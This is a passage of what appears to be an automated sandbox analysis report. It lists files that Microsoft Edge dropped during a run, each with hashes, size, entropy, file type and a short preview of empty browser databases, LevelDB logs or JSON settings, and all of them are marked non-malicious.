                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):524656
                                                                                                                                                            Entropy (8bit):5.027445846313988E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsulJ/S:Ls
                                                                                                                                                            MD5:1E8D8397AA99C134C16B522D9006056E
                                                                                                                                                            SHA1:43D8C3D137DC840B0EE20AF709A494A8EDA2B9E7
                                                                                                                                                            SHA-256:88A9FFCB17AF3C2D2475D440177323D5BDF07A0BED2328095BD5EB34E402C945
                                                                                                                                                            SHA-512:2D67BD14345936807399D9DE2E9FDA7D6AEB4419AFF205562D72F339DF68EA5F666A9F4B30F9BAD883D2DD47F2EDEA09B19D688F62C00FFFEA4B160AE3B11F36
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.........................................H..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNl8Ks+l:Ls3vl
                                                                                                                                                            MD5:73EE9435FA28ACE19DB525BD7EAC78F7
                                                                                                                                                            SHA1:017AEB300A0F36C15B316FDF7208407CDA2E962B
                                                                                                                                                            SHA-256:A319213761659954E5B16834F404C83F5945A07DDCD0664154143E1F01AE0662
                                                                                                                                                            SHA-512:8EFDA733B625F9F319C576B9C7CB7BB0BE5385D318C52BE86C9183C67DBF1B7AA0645426EF88D8923EF33029635CC03D49E64F751E32C660C53BD11A6758F8D2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................k.M.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):432
                                                                                                                                                            Entropy (8bit):5.2311617054034425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/4hvYfYebvqBQFUtNw/zauy5JfYebvqBvJ:7/sYfYebvZgN64JfYebvk
                                                                                                                                                            MD5:D7B1B0876BFF8196290668D91AAC777B
                                                                                                                                                            SHA1:9C08019561AE0795380B8627A050528011CB68EF
                                                                                                                                                            SHA-256:CCF8522BD1B627FC86704300A9294AA31E93BCCB435FABEF382CFB567941956A
                                                                                                                                                            SHA-512:6A0244DBC704B47DEBA76E4D890C094517DC9E77A220F98147C903389FEE11EF459D4AEF2217AFC03D6D6A1C166BCBAB9789C93B7899C5F7A1F4FCA83DD7AF9B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.256 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:59.257 10e0 Recovering log #3.2025/01/06-17:04:59.260 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):432
                                                                                                                                                            Entropy (8bit):5.2311617054034425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/4hvYfYebvqBQFUtNw/zauy5JfYebvqBvJ:7/sYfYebvZgN64JfYebvk
                                                                                                                                                            MD5:D7B1B0876BFF8196290668D91AAC777B
                                                                                                                                                            SHA1:9C08019561AE0795380B8627A050528011CB68EF
                                                                                                                                                            SHA-256:CCF8522BD1B627FC86704300A9294AA31E93BCCB435FABEF382CFB567941956A
SHA-512:6A0244DBC704B47DEBA76E4D890C094517DC9E77A220F98147C903389FEE11EF459D4AEF2217AFC03D6D6A1C166BCBAB9789C93B7899C5F7A1F4FCA83DD7AF9B
Malicious:false
Preview:2025/01/06-17:04:59.256 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:59.257 10e0 Recovering log #3.2025/01/06-17:04:59.260 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:false
Preview:{"SDCH":{"dictionaries":{},"version":2}}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):193
Entropy (8bit):4.864047146590611
Encrypted:false
SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
MD5:18D8AE83268DD3A59C64AAD659CF2FD3
SHA1:018C9736438D095A67B1C9953082F671C2FDB681
SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):36864
Entropy (8bit):0.555790634850688
Encrypted:false
SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
MD5:0247E46DE79B6CD1BF08CAF7782F7793
SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:false
Preview:{"SDCH":{"dictionaries":{},"version":2}}
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):36864
Entropy (8bit):0.36515621748816035
Encrypted:false
SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
MD5:25363ADC3C9D98BAD1A33D0792405CBF
SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):80
Entropy (8bit):3.4921535629071894
Encrypted:false
SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:69449520FD9C139C534E2970342C6BD8
SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:false
Preview:*...#................version.1..namespace-..&f.................&f...............
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):420
Entropy (8bit):5.198536577962994
Encrypted:false
SSDEEP:12:7/p0gOvYfYebvqBZFUtNp06/zp0RFZ5JfYebvqBaJ:7/mgMYfYebvygNmgmjLJfYebvL
MD5:B658B4A737148C329FB12A516B38C37B
SHA1:B23C734079C0B39E287C77B7F3B17D686BEE6701
SHA-256:DC876E9814D44E3DA3DBD7A733EAAA667B6E3440054BC15F2D811207779DE2EC
SHA-512:B55130E331AB005D6F0168FCEB07C2544E4D16476ABCD850DF502D12E45C0DD97C18F7FFAD23259F61B39EC156FD65FB49B014918D2CE3070CA210CD6FB2393B
Malicious:false
Preview:2025/01/06-17:05:15.329 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:05:15.330 10e0 Recovering log #3.2025/01/06-17:05:15.333 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):420
Entropy (8bit):5.198536577962994
Encrypted:false
SSDEEP:12:7/p0gOvYfYebvqBZFUtNp06/zp0RFZ5JfYebvqBaJ:7/mgMYfYebvygNmgmjLJfYebvL
MD5:B658B4A737148C329FB12A516B38C37B
SHA1:B23C734079C0B39E287C77B7F3B17D686BEE6701
SHA-256:DC876E9814D44E3DA3DBD7A733EAAA667B6E3440054BC15F2D811207779DE2EC
SHA-512:B55130E331AB005D6F0168FCEB07C2544E4D16476ABCD850DF502D12E45C0DD97C18F7FFAD23259F61B39EC156FD65FB49B014918D2CE3070CA210CD6FB2393B
Malicious:false
Preview:2025/01/06-17:05:15.329 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:05:15.330 10e0 Recovering log #3.2025/01/06-17:05:15.333 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):326
Entropy (8bit):5.245420116150527
Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/UX+q2Pwkn23oH+TcwtpIFUtNUzXAZmwzUzXwVkwOwkn23oH+Tcwta/WLJ:7/UuvYfYebmFUtNUk/zUE5JfYebaUJ
                                                                                                                                                            MD5:9C81A23A59463EB59A76BED73603660F
                                                                                                                                                            SHA1:75C4B8541373DFCED28CE4976818B8F2EFA0EB25
                                                                                                                                                            SHA-256:FA88CF3119008093C6147EE75D7EA9700FC2FA732922E9C54703072F9A073FE2
                                                                                                                                                            SHA-512:0124962FC4AE61A27634882F23128EAED3B21F247AEEE764EE9EE0B380ABE234E6379544C63F5865A22AAC30AF7DDFAA47A4CEC8AAAA2A7FCE45BB9A1D8478FC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.386 1218 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:04:58.387 1218 Recovering log #3.2025/01/06-17:04:58.387 1218 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):326
                                                                                                                                                            Entropy (8bit):5.245420116150527
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/UX+q2Pwkn23oH+TcwtpIFUtNUzXAZmwzUzXwVkwOwkn23oH+Tcwta/WLJ:7/UuvYfYebmFUtNUk/zUE5JfYebaUJ
                                                                                                                                                            MD5:9C81A23A59463EB59A76BED73603660F
                                                                                                                                                            SHA1:75C4B8541373DFCED28CE4976818B8F2EFA0EB25
                                                                                                                                                            SHA-256:FA88CF3119008093C6147EE75D7EA9700FC2FA732922E9C54703072F9A073FE2
                                                                                                                                                            SHA-512:0124962FC4AE61A27634882F23128EAED3B21F247AEEE764EE9EE0B380ABE234E6379544C63F5865A22AAC30AF7DDFAA47A4CEC8AAAA2A7FCE45BB9A1D8478FC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.386 1218 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:04:58.387 1218 Recovering log #3.2025/01/06-17:04:58.387 1218 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28672
                                                                                                                                                            Entropy (8bit):0.26707851465859517
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                            MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                            SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                            SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                            SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):184320
                                                                                                                                                            Entropy (8bit):1.0672123235125275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:QSqzWMMUfTFnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYjun6:QrzWMffBnzkkqtXnTK+hNH+5EVumt
                                                                                                                                                            MD5:8015A053BDD9EE878B4CBBC3778378D1
                                                                                                                                                            SHA1:774DE519A2F9564FC26A71C101F065C6D9F8DF96
                                                                                                                                                            SHA-256:ECE1B2E349D120BB9AF0275768C146B05C267D625401A3D85FD37D50F0E1B0F2
                                                                                                                                                            SHA-512:A0EE463995CA2B9187B2E82911874AF68182744080D21022BA6A17109CDB15FF3E0607B0BC6B6118182CA1BE83AB5AA27BD380CA1DE91CFB7326C66A30843F88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14336
                                                                                                                                                            Entropy (8bit):0.7836182415564406
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                            MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                            SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                            SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                            SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                            Malicious:false
